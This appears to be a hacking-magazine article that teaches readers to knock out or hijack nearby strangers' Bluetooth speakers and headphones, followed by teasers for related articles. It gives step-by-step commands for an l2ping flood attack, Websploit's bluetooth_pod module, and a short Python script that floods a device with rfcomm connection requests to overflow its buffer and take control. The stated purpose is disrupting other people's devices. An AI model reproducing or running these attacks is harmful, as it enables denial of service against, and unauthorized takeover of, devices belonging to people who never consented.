
Gangs of teenagers with portable Bluetooth speakers playing loud music drive me nuts. Today, I will explain how to neutralize this ‘natural disaster’ without (OK, almost without) committing a criminal offense.
Modern Wi-Fi routers can filter out unwanted packets, but the majority of Bluetooth adapters are dumb, to say the least. They neither care what packets you send, nor what is their size and number. Therefore, you can increase the information volume of a ping packet in Linux to a tremendous size and then send 1000 such packets to a Bluetooth device.
First, you have to find a suitable device within the range using the command
$ hcitool scan
The command displays the list of available Bluetooth devices and their MAC addresses. If your system cannot see a Bluetooth adapter, try installing a Bluetooth manager for Linux. For instance, in Kali, I use gnome-bluetooth installed by the command:
$ apt-get install gnome-bluetooth
Alternatively, you can use the blueman utility:
$ apt-get install blueman
After getting the list of potential victims, attack them using one of the methods below:
Method 1. l2ping
Enter the command:
$ l2ping -i hci0 -s -f
It will generate packets with the size specified by the
parameter and send them to the MAC address specified by the
parameter. As a result, you will observe the following situation: the response time in the terminal is steadily growing, and the Bluetooth function on the attacked device stops working. After a while, it will turn on again – but the annoying loud music would be off for some time bringing you malicious satisfaction.

INFO
The above scheme works fine if the attacked device (e.g. a smartphone) us connected to headphones or a speaker via Bluetooth. After the attack, the two devices won’t be able to reconnect with each other.
Method 2. Websploit
There is also a more elegant way to silence a speaker producing rap sounds. Launch the Websploit utility:
$ websploit
Enter the following command in the console:
$ show modules
It will display all modules compatible with this utility; there are plenty of Wi-Fi components, but you need the bluetooth/bluetooth_pod module.
$ use bluetooth/bluetooth_pod
Now you have to set up the parameters and specify the attacked device:
$ show options
$ set bdaddr
To make sure that Bluetooth is killed, change the size of the outgoing packet:
$ set size 999
Time to launch the ‘silence machine’:
$ run
The resultant picture is the same: the ping duration increases, and the music stops. Terrific!
The above two methods are effective against nearly all Bluetooth speakers, headphones, and other similar devices. This is because their manufacturers are too lazy to release firmware updates enabling the filtering of incoming packets. Therefore, if you have a Linux laptop, you can silence any speaker within its range.
If the speaker withstands the attack, you may try sending packets to the phone connected to it. I tested this method on a powerful JBL Xtreme speaker, and it withstood the load. But cheap made-in-China devices are effectively silences by this attack.
Ready-to-use jammers
Online stores offer exciting devices, including jammers operating at certain frequencies. Such gadgets may cost good money and offer various capabilities. Some of them kill all mobile signals, including Wi-Fi and Bluetooth, at once, while others cannot even jam H+.
If you really need such a device, I strongly recommend to research the respective articles in the national legislation prior to purchasing it. In some countries, you have to register your jammer with the authorities; failure to do so results in administrative or criminal liability.
Connecting to another device.
As discussed above, simple speakers and headphones almost never filter out the received packets. But what if you send to such a device not a just ping packet, but a packet containing a connection request? Or many such packets?
Not all manufacturers take precautions against the buffer overflow error. What happens if the received packets are lined up, and no space is left to store new requests? In such a situation, the speaker would try to execute the command and concurrently clear the buffer.
Therefore, use the standard Bluetooth communication protocol, rfcomm. Too bad, the utility controlling this protocol doesn’t allow to send a thousand of such requests. So, I am going to write a short Python script automating the process.
#!/usr/bin/env python
import subprocess
cmd=['rfcomm', 'connect', '', '1']
for i in range(0, 1001):
subprocess.call(cmd)
print('Connecting...')
Before running the script, you have to find out the MAC address of the device. Use the above mentioned hcitool scan
command and insert the retrieved address into the script instead of the
. Save the script and execute it:
$ python
The success or failure of the script execution will depend on the model of the attacked device (to be specific, on the time required to fill its buffer). If the buffer becomes full prior to the flushing, the command will be executed, and you connect to the speaker simultaneously with its legitimate user. However, if the buffer is flushed first, you will have to run the script again.
After the successful execution of the script, you can throw your own disco party or disable the device. My experiments with JBL Xtreme resulted in its shutdown, while JBL Flip 2 has passed under my full control.
Let the silence be with you! Good luck!

2022.12.15 — What Challenges To Overcome with the Help of Automated e2e Testing?
This is an external third-party advertising publication. Every good developer will tell you that software development is a complex task. It's a tricky process requiring…
Full article →
2022.02.15 — Reverse shell of 237 bytes. How to reduce the executable file using Linux hacks
Once I was asked: is it possible to write a reverse shell some 200 bytes in size? This shell should perform the following functions: change its name…
Full article →
2022.06.02 — Climb the heap! Exploiting heap allocation problems
Some vulnerabilities originate from errors in the management of memory allocated on a heap. Exploitation of such weak spots is more complicated compared to 'regular' stack overflow; so,…
Full article →
2022.06.03 — Playful Xamarin. Researching and hacking a C# mobile app
Java or Kotlin are not the only languages you can use to create apps for Android. C# programmers can develop mobile apps using the Xamarin open-source…
Full article →
2022.01.13 — Bug in Laravel. Disassembling an exploit that allows RCE in a popular PHP framework
Bad news: the Ignition library shipped with the Laravel PHP web framework contains a vulnerability. The bug enables unauthorized users to execute arbitrary code. This article examines…
Full article →
2022.02.16 — Timeline of everything. Collecting system events with Plaso
As you are likely aware, forensic analysis tools quickly become obsolete, while hackers continuously invent new techniques enabling them to cover tracks! As…
Full article →
2023.03.03 — Nightmare Spoofing. Evil Twin attack over dynamic routing
Attacks on dynamic routing domains can wreak havoc on the network since they disrupt the routing process. In this article, I am going to present my own…
Full article →
2022.01.13 — Step by Step. Automating multistep attacks in Burp Suite
When you attack a web app, you sometimes have to perform a certain sequence of actions multiple times (e.g. brute-force a password or the second authentication factor, repeatedly…
Full article →
2023.03.03 — Infiltration and exfiltration. Data transmission techniques used in pentesting
Imagine a situation: you managed to penetrate the network perimeter and gained access to a server. This server is part of the company's internal network, and, in theory, you could…
Full article →
2023.03.26 — Attacks on the DHCP protocol: DHCP starvation, DHCP spoofing, and protection against these techniques
Chances are high that you had dealt with DHCP when configuring a router. But are you aware of risks arising if this protocol is misconfigured on a…
Full article →